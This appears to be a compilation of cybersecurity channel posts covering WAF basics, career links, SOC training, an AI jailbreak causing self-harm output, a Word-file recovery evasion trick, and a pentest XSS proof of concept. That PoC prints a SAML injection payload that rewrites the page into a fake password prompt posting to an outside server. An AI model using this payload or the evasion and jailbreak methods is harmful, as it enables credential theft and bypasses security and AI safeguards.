🦑New AI Jailbreak Meth:

Suicide Bot: New AI Attack Causes LLM to Provide Potential “Self-Harm” Instructions

https://youtu.be/AS2kJgOgyQ4


» Doc :
https://www.knostic.ai/blog/introducing-a-new-class-of-ai-attacks-flowbreaking

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top Malware Analysis Tools:

Ref: Harun Seker, CISSP
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New (free) Course Launch- from the Open University Cisco ASC - focussing on UK Legislation for Digital and Cyber - it is currently a beta, however all educators and students may use this resource

🦑𝐇𝐨𝐰 𝐃𝐨𝐞𝐬 𝐚 𝐖𝐀𝐅 𝐰𝐨𝐫𝐤?
A Web Application Firewall (WAF) functions by monitoring and filtering HTTP/HTTPS traffic to and from web applications.

𝐊𝐞𝐲 𝐨𝐩𝐞𝐫𝐚𝐭𝐢𝐨𝐧𝐚𝐥 𝐜𝐨𝐦𝐩𝐨𝐧𝐞𝐧𝐭𝐬 𝐢𝐧𝐜𝐥𝐮𝐝𝐞: -

𝐓𝐫𝐚𝐟𝐟𝐢𝐜 𝐀𝐧𝐚𝐥𝐲𝐬𝐢𝐬: It scrutinizes incoming and outgoing requests to pinpoint anomalies or potential threats.

𝐑𝐮𝐥𝐞 𝐄𝐧𝐟𝐨𝐫𝐜𝐞𝐦𝐞𝐧𝐭: Predefined rulesets are applied to identify and mitigate malicious activity. Analytical techniques employed by a WAF encompass:

𝐁𝐥𝐚𝐜𝐤𝐥𝐢𝐬𝐭𝐢𝐧𝐠: This approach blocks requests from known malicious IP addresses, preventing unauthorized access.

𝐖𝐡𝐢𝐭𝐞𝐥𝐢𝐬𝐭𝐢𝐧𝐠: Only explicitly approved requests are allowed through, enhancing security by default.

𝐒𝐢𝐠𝐧𝐚𝐭𝐮𝐫𝐞-𝐁𝐚𝐬𝐞𝐝 𝐃𝐞𝐭𝐞𝐜𝐭𝐢𝐨𝐧**This method involves recognizing established attack patterns based on known signatures.

**𝐁𝐞𝐡𝐚𝐯𝐢𝐨𝐫𝐚𝐥 𝐀𝐧𝐚𝐥𝐲𝐬𝐢𝐬: Leveraging machine learning algorithms, the WAF can identify suspicious behaviors that may deviate from normal activity. Unlike traditional antivirus solutions that rely solely on signature detection,
WAFs utilize more sophisticated detection mechanisms.

𝐎𝐧𝐜𝐞 𝐭𝐡𝐫𝐞𝐚𝐭𝐬 𝐚𝐫𝐞 𝐝𝐞𝐭𝐞𝐜𝐭𝐞𝐝, 𝐭𝐡𝐞 𝐖𝐀𝐅 𝐢𝐦𝐩𝐥𝐞𝐦𝐞𝐧𝐭𝐬 𝐭𝐡𝐞 𝐟𝐨𝐥𝐥𝐨𝐰𝐢𝐧𝐠 𝐦𝐞𝐚𝐬𝐮𝐫𝐞𝐬:

𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐁𝐥𝐨𝐜𝐤𝐢𝐧𝐠: Directly halting any identified malicious requests.

𝐄𝐯𝐞𝐧𝐭 𝐋𝐨𝐠𝐠𝐢𝐧𝐠: Recording incidents for further investigation and analysis, facilitating continued improvement of security postures.

Image credit: Cyber Edition
Ref: Praveen Singh
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑𝐂𝐲𝐛𝐞𝐫 𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐜𝐚𝐫𝐞𝐞𝐫𝐬 𝐏𝐚𝐭𝐡.

1) Security certification roadmap https://lnkd.in/ghvqfZ3z & https://lnkd.in/eFU8WC29

2) Domains of cyber security https://lnkd.in/eXsfxkTs

3) Cyber career map https://lnkd.in/evTUCgas

4) Cyber career map https://dsci.in

Suggestion on how to use these: ask yourself
👉 What domain of security interests you (offensive? Policy? Defence?),
👉 What job you want (pentester? CISO?),
👉 What certifications you might need (OSCP? CEH?)
👉 What level they are at, build up a plan of how to get there?
Thank you Katie Paxton-Fear for nice sharing.

Ref: G M Faruk Ahmed, CISSP, CISA

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New evasion technique that is bypassing almost all security solutions so far, taking advantage of the recovery functionality in applications. This is groundbreaking as most if not all endpoint solutions aren’t armed with any file recovery techniques and would fail to detect this attack vector.

>> Microsoft has structured word documents similar to archives, constructing any doc file with 3 sections; starting with local file headers, central file headers and end directory records. These 3 sections are linked backward starting from the end to the header.

>> Manipulating any of these sections makes it harder for any endpoint or email security solution to unpack and identify the issue, but recoverable by its intending application after its too late.

Ref: Chadi S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How run the Password Reset Flaw | Live PoC - New method

Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The Official NASA CSRF Vulnerability Video

🦑 Leveling Up Our XSS Proof of Concepts at CybaVerse :

It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).

We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.

Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.

Here’s a snippet of the payload I crafted:

⚠️ <samlp:StatusCode Value="XSS POC&#39;;document.body.innerHTML=&#39;&lt;br&gt;&lt;h1&gt;Authentication failed, re-enter your password&lt;/h1&gt;&lt;br&gt;&lt;form action=&quot;//https://lnkd.in/ecG5926A&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;br&gt;&lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;&lt;/form&gt;&#39;+document.body.innerHTML;&"/> ⚠️

The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”

Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.

Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE 𝐒𝐎𝐂 𝐭𝐫𝐚𝐢𝐧𝐢𝐧𝐠𝐬:

✅Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna

✅TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁